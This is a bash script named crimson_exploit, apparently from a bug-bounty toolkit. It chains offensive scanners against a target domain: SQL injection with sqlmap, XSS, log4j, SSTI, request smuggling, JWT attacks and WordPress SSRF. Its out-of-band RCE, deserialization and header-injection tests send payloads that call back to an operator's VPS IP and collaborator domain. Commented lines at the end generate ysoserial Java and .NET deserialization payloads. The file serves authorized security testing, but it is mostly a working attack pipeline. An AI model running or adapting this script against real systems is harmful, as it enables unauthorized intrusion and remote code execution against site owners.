crimson_exploit

#!/bin/bash
pid=$$
# Delete below line if you install Crimson from source:
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/go/bin:/root/go/bin:$HOME/tools/codeql:"
#
### CREATED BY KARMAZ
#
#
#
### FUNCTIONS:
#
# 1. FUZZING PATHS IN URLS FROM dirs.txt WITH CUSTOM PAYLOADS
# 2. FUZZING PARAMS IN URLS FROM params.txt WITH CUSTOM PAYLOADS
# 3. TESTING FOR XSS
# 4. TESTING JAVASCRIPT SOURCE CODE
# 5. TESTING HTTP REQUEST SMUGGLING
# 6. TESTING PROTOTYPE POLLUTION
# 7. TESTING FOR BROKEN LINKS
# 8. TESTING SQLI
# 9. TESTING OUT-OF-BOUND RCE/SSRF
# 10. TESTING JAVA DESERIALIZATION
# 11. TESTING CRLF INJECTION
# 12. TESTING FOR OPEN REDIRECTION
# 13. TESTING WORDPRESS
# 14. TESTING CVES
# 15. TESTING HEADER INJECTIONS

#
### LISTS:
#
# 1. bug_params.txt         - Fuzzing output
# 2. bug_dirs.txt           - Fuzzing output
# 3. vuln_xss               - Output from XSSstrike with vulnerable urls ready to open in browser
# 4. nuclei.txt            - Output from nuclei scanning
# 5. smuggler.txt           - Output after testing for HTTP request smuggling.
# 6. prototype-pollution    - Potentailly vulneable params to prototype pollution.
# 7. broken_links.txt       - Output from BLC
# 8. sqli/                  - Output from sqlmap
# 9. oob.txt                - Log after OAST  
# 10. CRLF.txt              - Output from crlfuzz
# 11. OR.txt                - Potentailly vulnerable URLS to Open Redirect vulnerability
# 12. dalfox.txt            - Output from dalfox
# 13. ssti.txt              - Output from crimson_templator with SSTI vulnerable urls.
# 14. wp/                   - Output from WPSCAN
# 15. deserializator.txt    - Logs from crimson_deserializator 
# 16. semgrep.txt           - Output from semgrep after testing the JavaScript source code.
# 17. headi.txt             - Otput from headi
#
### WORKFLOW
#
# 0. Start BURP - optional step
#   - Create new project - www.example.tld
#   - Turn off interception
# 1. Start vps listener and collaborator server
# 2. Start the script
#   - You will be asked to remove false positives from exp/dirs.txt and exp/params.txt
#   - Remove them and run the script again as before.
# 3. Check the output listed above (LISTS)
# 4. Look for [ID] [TIME] in oob.txt and compare it to pings on your vps / collaborator
#
###

### Catch crash in trap and save the function name in anchor.log
trap 'echo $anchor > anchor.log && exit 1' SIGINT
trap 'echo $anchor > anchor.log && exit 1' SIGHUP
trap 'echo $anchor > anchor.log && exit 1' SIGKILL
trap 'echo $anchor > anchor.log && exit 1' SIGTERM

anchor_check() {
	### 0.RETRY FUNCTION IF IT'S NOT IN anchor.log
	anchor="$1"
	[ ! -f "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log" ] && return 0
	if grep -q "$1" "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log"; then
		rm "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log"; return 0
	else
		return 1
	fi
}

clear_log() {
    ### REMOVE TRASH
    rm temp_params.txt 
    rm temp_dirs.txt
    rm temp_or_test.txt
    ### REMOVE EMPTY FILES AND DIRECTORIES
    find . -type d -empty -print -delete -o -type f -empty -print -delete
    rm -rf nuclei-templates
    ### REMOVING LOG IF PROGRAM EXIT NORMALLY
	if [ -f "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log" ]; then
			rm "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log"
	fi
}
### ---

### ALL FUNCTIONS:
review_the_content_of_files() {
    ### VI / CAT / GREP
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m CHECK $HOME/bounty/$DOMAIN/$domain/exp/dirs.txt and params.txt"
    echo -e "\033[0;31m [+][+]\033[0m REMOVE TRASH MANUALLY"
    echo -e "\033[0;31m [+][+][+]\033[0m RE-RUN CRIMSON_EXPLOIT"
    echo "continue_crimson_exploit" > "$HOME/bounty/$DOMAIN/$domain/exp/anchor.log"
    exit 1
}

continue_crimson_exploit() {
    ### CRIMSON_PARAMJUGGLER.py
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m WORDLISTS SUCCESSFULLY EDITED - CONTINUING THE SCRIPT EXECUTION"
    python2 "$HOME"/tools/CRIMSON/scripts/crimson_paramjuggler.py -l params.txt -p "FUZZ" >> temp_params.txt
}

test_ssl_and_merge_params_dirs() {
    anchor_check "${FUNCNAME[0]}" || return 0

    testssl --warnings off "$domain" | tee -a testssl.txt
    sort -u dirs.txt | anew all.txt > /dev/null
    cat params.txt | anew all.txt > /dev/null
}

nuclei_scan_all() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m RUNNING NUCLEI"
    git clone https://github.com/projectdiscovery/nuclei-templates.git > /dev/null 2>&1
    rm -rf nuclei-templates/token-spray > /dev/null 2>&1
    nuclei -c 200 -H "User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100" -l all.txt -t nuclei-templates/ -o nuclei.txt -stats -silent
}

log4j_scan() {
	### LOG4J-SCAN
	anchor_check "${FUNCNAME[0]}" || return 0

	echo -e "\033[0;31m [+]\033[0m STARTING LOG4J SCAN"
	cp /root/tools/log4j-scan/headers.txt headers.txt
	/root/tools/log4j-scan/log4j-scan.py -l all.txt --custom-dns-callback-host "$collaborator_domain" > log4j.txt
	rm headers.txt
}

test_xss_with_xsstrike() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m LOOKING FOR XSS VULNERABILITIES WITH XSS-STRIKE"
    python3 "$HOME"/tools/XSStrike/xsstrike.py --seeds all.txt -t 200 --log-file xss --file-log-level VULN
}

test_xss_with_dalfox() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m LOOKING FOR XSS VULNERABILITIES WITH DALFOX"
    cat all.txt | dalfox pipe --mass --silence --no-color -o dalfox.txt
}

test_oob_with_goast() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING OUT-OF-BOUND INTERACTIONS (OOB)"
    go run "$HOME"/tools/CRIMSON/scripts/GOAST/GOAST.go -p "$HOME/tools/CRIMSON/words/exp/OOB" -u "params.txt" -o oob.txt -d "$collaborator_domain" -i "$vps_ip" -y "$HOME/tools/ysoserial/ysoserial.jar" -h "$cookie" > /dev/null
}

test_java_deserialization_with_crimson_deserializator() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING JAVA DESERIALIZATION (OOB)"
    python2 "$HOME"/tools/CRIMSON/scripts/crimson_deserializator.py -d "$collaborator_domain" -w params.txt -c "$cookie" | tee -a deserializator.txt
}

test_crlf_with_crlfuzz() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING FOR CRLF INJECTIONS IN URL"
    crlfuzz -l all.txt -s | tee -a CRLF.txt
}

test_open_redirections_with_wfuzz() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING FOR OPEN REDIRECTIONS IN URL"
    cat dirs.txt | sed "s/$/FUZZ/"  >> temp_or_test.txt
    cat temp_params.txt >> temp_or_test.txt
    custom_i=0; 
    cat temp_or_test.txt | while IFS= read -r line in; do custom_i=$((custom_i+1)) && wfuzz -t 100 -f temp_OR$custom_i.txt,raw -Z -z file,"$HOME"/tools/CRIMSON/words/exp/OR --sc 300,301,302,303,304,305,306,307,308 -H "$cookie" --field url "$line" | tail -n+11 ;done
    sort -u  temp_OR* | grep "http" | grep -v "Pycurl" | grep -v "^Target" >> OR.txt
    rm temp_OR*
}

test_ssti_with_crimson_templator() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING FOR SERVER SIDE TEMPLATE INJECTIONS"
    python2 "$HOME"/tools/CRIMSON/scripts/crimson_templator.py -w params.txt -c "$cookie" -o SSTI.txt
}

test_wordpress_if_exists() {
    anchor_check "${FUNCNAME[0]}" || return 0

    if [[ $(cat ../recon.txt | grep cms_name | cut -d "\"" -f 4) == "WordPress" ]]
    then
        mkdir wp
        echo -e "\033[0;31m [+]\033[0mURL STARTING WP ENUMERATION"
        ### ENUMERATION USING wpscan > wpscan.txt
        wpscan --no-banner --url "$domain" -o wp/wpscan.txt --cookie-string "$cookie" --no-update
        ### SSRF CHECK
        echo -e "\033[0;31m [+]\033[0mURL LOOKING FOR SSRF IN WORDPRESS"
        quickpress -server http://"$collaborator_domain" -target https://"$domain"
        quickpress -server http://"$collaborator_domain" -target http://"$domain"
        ### PLUGIN ENUMERATION > plugins.txt && ssl_plugins.txt
        echo -e "\033[0;31m [+]\033[0mURL BRUTEFORCING PLUGINS"
        python3 "$HOME"/tools/WPluginScanner/wpluginscanner.py http://"$domain" -o wp/plugins.txt -p popular.txt > /dev/null 2>&1
        python3 "$HOME"/tools/WPluginScanner/wpluginscanner.py https://"$domain" -o wp/ssl_plugins.txt -p popular.txt > /dev/null 2>&1
        echo -e "\033[0;31m [+]\033[0mURL CHECK WP/ DIRECTORY AND RUN python3 wpbullet.py --path DOWNLOADED_PLUGIN"
    fi
}

test_smuggling_with_smuggler(){
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING HTTP REQUESTS SMUGGLING"
    cat all.txt | python3 "$HOME"/tools/smuggler/smuggler.py -l smuggler.txt -q > /dev/null
}

test_broken_links_with_blc() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m LOOKING FOR BROKEN LINKS"
    cat all.txt | while IFS= read -r url; do blc "$url" -ro | grep -v "Getting links from:" >> broken_links.txt ;done
}

test_sqli_with_sqlmap() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING SQLI"
    sqlmap -m params.txt -b --batch -o -v 0 -H "$cookie" - --output-dir=sqli --banner 
}

test_jwt_if_exists() {
    anchor_check "${FUNCNAME[0]}" || return 0

    jwt=$(echo "$cookie" | cut -d ":" -f 2 | grep "ey.*\..*\.[^;]*" -o)
    if [ -n "$jwt" ]
    then
        python3 "$HOME"/tools/jwt_tool/jwt_tool.py "$jwt" | tail -n+14 | tee -a jwt.txt
        python3 "$HOME"/tools/jwt_tool/jwt_tool.py -t https://"$domain"/ -rc "$cookie" -M pb | tee -a jwt.txt
    fi
}

test_header_injections_with_headi() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING HEADER INJECTION"
    cat "$HOME"/tools/CRIMSON/words/exp/headi.txt | sed "s/vps_ip/$vps_ip/" | sed "s/domain_collab/$collaborator_domain/" > temp_headers.txt
    cat all.txt | while IFS= read -r i; do headi --url "$i" -p temp_headers.txt >> header_injections.txt ;done
    rm temp_headers.txt
}

test_javascript_with_codeql() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING JAVASCRIPT SOURCE CODE WITH CODEQL"
    mkdir codeqltest
    cd codeqltest
    custom_i=0
    cat ../jsfiles.txt | while IFS= read -r url; do wget "$url" --tries=3 -O $custom_i".js" --no-check-certificate && custom_i=$(($custom_i+1)); done  
    cp "$HOME"/tools/CRIMSON/scripts/codeql/codeql-js.sh .
    ./codeql-js.sh "$domain" 50 burp beau
    cat ./*.csv > ../codeql.txt
    cd ..
}

test_javascript_with_semgrep() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m TESTING JAVASCRIPT SOURCE CODE WITH SEMGREP"
    mkdir semgreptest
    cd semgreptest
    #cp ../codeqltest/*.js . # works only with codeql
    cat ../jsfiles.txt | while IFS= read -r url; do wget "$url" --tries=3 -O $custom_i".js" --no-check-certificate && custom_i=$(($custom_i+1)); done
    semgrep --config=p/security-audit -o semgrep1.txt
    semgrep --config=p/r2c-ci -o semgrep2.txt
    semgrep --config=r/javascript -o semgrep3.txt
    cat semgrep*.txt > ../semgrep.txt
    cd ..
}

test_prototype_pollution_with_plution() {
    anchor_check "${FUNCNAME[0]}" || return 0

    cat all.txt | plution | grep "Vulnerable\!" >> prototype-pollution.txt
}

parameter_fuzzing_with_wfuzz() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m PARAMETER FUZZING"
    ### FUZZ ALL URLS IN params.txt WITH bug WORDLIST > bug_params.txt
    custom_i=0;
    cat temp_params.txt | while IFS= read -r line; do custom_i=$((custom_i+1)) && wfuzz -t 100 -f temp_bug$custom_i.txt,raw -Z -z file,"$HOME"/tools/CRIMSON/words/bug -H "$cookie" "$line" | tail -n+11; done
    sort -u  temp_bug* | grep "http" | grep -v "Pycurl" | grep -v "^Target" > bug_params.txt
    rm temp_bug*
}

dirs_fuzzing_with_wfuzz() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0mURL FUZZING"
    ### FUZZ ALL URLS IN dirs.txt WITH bug WORDLIST > bug_dirs.txt
    wfuzz -t 100 -f bug_dirs.txt,raw -L -Z -z file,dirs.txt -z file,"$HOME"/tools/CRIMSON/words/bug -H "$cookie" FUZZFUZ2Z
}

open_all_xss_in_firefox() {
    anchor_check "${FUNCNAME[0]}" || return 0

    echo -e "\033[0;31m [+]\033[0m OPEN VULNERABLE XSS IN FIREFOX USING:
    wget https://github.com/Karmaz95/crimson/blob/master/scripts/crimson_opener/crimson_opener.py
        => python crimson_opener.py -o vuln_xss "
    cat xss | grep "Vulnerable webpage" | cut -d " " -f 9 | sed "s/^.....//" | sed "s/....$//" > url_XSS
    cat xss | grep Vector | cut -d " " -f 9 | sed "s/^.....//" | sed "s/.....$//" > param_XSS
    cat xss | grep Vector | cut -d " " -f 10  > payload_XSS
    paste url_XSS param_XSS payload_XSS | cat -A | sed 's/\^I/\?/' | sed 's/\^I/=/' | sed -r 's/(.*)\$/\1 /' > vuln_xss && rm url_XSS param_XSS payload_XSS
}
### ---
echo -e "\033[0;31m
 ██████╗██████╗ ██╗███╗   ███╗███████╗ ██████╗ ███╗   ██╗        ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
██╔════╝██╔══██╗██║████╗ ████║██╔════╝██╔═══██╗████╗  ██║        ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
██║     ██████╔╝██║██╔████╔██║███████╗██║   ██║██╔██╗ ██║        █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
██║     ██╔══██╗██║██║╚██╔╝██║╚════██║██║   ██║██║╚██╗██║        ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
╚██████╗██║  ██║██║██║ ╚═╝ ██║███████║╚██████╔╝██║ ╚████║███████╗███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
 ╚═════╝╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
\033[0m"

fuzzing_on=0
opening_on=0
while getopts "c:d:i:D:x" OPTION; do
    case $OPTION in
    c)
        cookie=$OPTARG
        ;;
    d)
        collaborator_domain=$OPTARG
        ;;
    i)
        vps_ip=$OPTARG
        ;;
    D)
        domain=$OPTARG
        DOMAIN=$(tldextract "$domain" | cut -d " " -f 2-3 | sed "s/\ /\./")
        ;;
    x)
        fuzzing_on=1
        ;;
    *)
        echo "Incorrect options provided"
        exit 1
        ;;
    esac
done

### CHECK IF USER SET A COOKIE IF NOT SET IT TO a
if [ -z "$cookie" ]
then
    export cookie="Cookie: a=1;";
else
    export cookie=$cookie;
fi

if [ -z "$collaborator_domain" ] || [ -z "$vps_ip" ] || [ -z "$domain" ] || [ -z "$DOMAIN" ]
then
    echo "Export domain and DOMAIN first!"
    echo "  Usage: ./crimson_exploit -D \"www.example.tld\" -i \"127.0.0.1\" -d \"burp.net\"

                    # Optional flags are shown below:
                 -c \"Cookie: auth1=123;\"
                 -x # Fuzzing all.txt with bug wordlist"

    exit 1
else
### CHANGE TO WORKING DIRECTORY
cd "$HOME"/bounty/"$DOMAIN"/"$domain"/exp || exit
### REVIEW THE CONTENT OF FILES
review_the_content_of_files
### CONTINUE THE EXECUTION
continue_crimson_exploit
### TESTING FOR CRYPTOGRAPHIC ISSUES && MERGE (params.txt) AND (dirs.txt) > all.txt
test_ssl_and_merge_params_dirs
### CHECK VULNS USING NUCLEI TEMPLATES
nuclei_scan_all
### CHEK FOR LOG4J > log4j.txt
log4j_scan
### CHECK FOR XSS VULNERABILITY in all.txt > vuln_xss
test_xss_with_xsstrike
### TEST XSS USING DAFLOX > dalfox.txt
test_xss_with_dalfox
### TEST OOB > oob.txt (TESTS JAVA DESERIALIZATION)
test_oob_with_goast
### TEST CRLF > CRLF.txt
test_crlf_with_crlfuzz
### TEST SSTI > SSTI.txt
test_ssti_with_crimson_templator
### CHECK IF THERE IS A WORDPRESS AND EXPLOIT IT
test_wordpress_if_exists
### TEST HTTP REQUEST SMUGGLING > smuggler.txt
test_smuggling_with_smuggler
### TEST BROKEN  LINKS > broken_links.txt
test_broken_links_with_blc
### TEST SQLi > sqli/
test_sqli_with_sqlmap
### TEST JWT IF EXISTS > jwt.txt
test_jwt_if_exists
### TEST HEADER INJECTIONS > header_injections.txt // ONLY HTTPS
test_header_injections_with_headi
### TEST JAVASCRIPT WITH SEMGREP = semgrep.txt
test_javascript_with_semgrep
### TEST FOR PROTOTYPE POLLUTION = prototype-pollution.txt
test_prototype_pollution_with_plution

### --- FUZZING SECTION --- ### -x
if [ $fuzzing_on == 1 ]
then
    if [ -s "params.txt" ]
    then
        parameter_fuzzing_with_wfuzz
    else
        echo " [-] params.txt IS EMPTY"
    fi

    if [ -s "dirs.txt" ]
    then
        dirs_fuzzing_with_wfuzz
    else
        echo " [-] dirs.txt IS EMPTY"
    fi
    ### TEST OR > OR.txt
    test_open_redirections_with_wfuzz
fi
### --- END OF FUZZING SECTION --- ###    

### OPEN ALL XSS IN FIREFOX FOR MANUAL REVIEW
#open_all_xss_in_firefox
### REMOVE TRASH AND anchor.log
clear_log
### CHECK FILES
echo -e "\033[0;31m [+]\033[0m CHECK FILES: 
    - vuln_xss
    - oob.txt
    - smuggler.txt 
    - CRLF.txt
    - OR.txt
    - broken_links.txt 
    - SSTI.txt 
    - dalfox.txt
    - jwt.txt
    - semgrep.txt
    - prototype-pollution.txt
    - header_injections.txt"
fi



### GENERATE ALL JAVA PAYLOADS FOR MANUAL DESERIALIZATION
#for gadget in $(cat $HOME/tools/CRIMSON/words/exp/jargadgets); do java -jar $HOME/tools/ysoserial/ysoserial.jar $gadget "$collaborator_domain" | base64 -w0 >> temp_payloads.txt && echo >> temp_payloads.txt ;done ; sed '/^$/d' temp_payloads.txt > java_deserialization_payloads.txt; rm temp_payloads.txt

### GENERATE ALL PAYLOADS FOR .NET DESERIALIZATION FOR MANUAL TESTING
#for gadget in $(cat $HOME/tools/CRIMSON/words/exp/netgadgets); do wine $HOME/tools/netysoserial/ysoserial.exe -f BinaryFormatter -g $gadget -o base64 -c "$collaborator_domain" >> net_deserialization_payloads.txt ;done

### python "$HOME"/tools/CRIMSON/scripts/crimson_opener/crimson_opener.py -o vuln_xss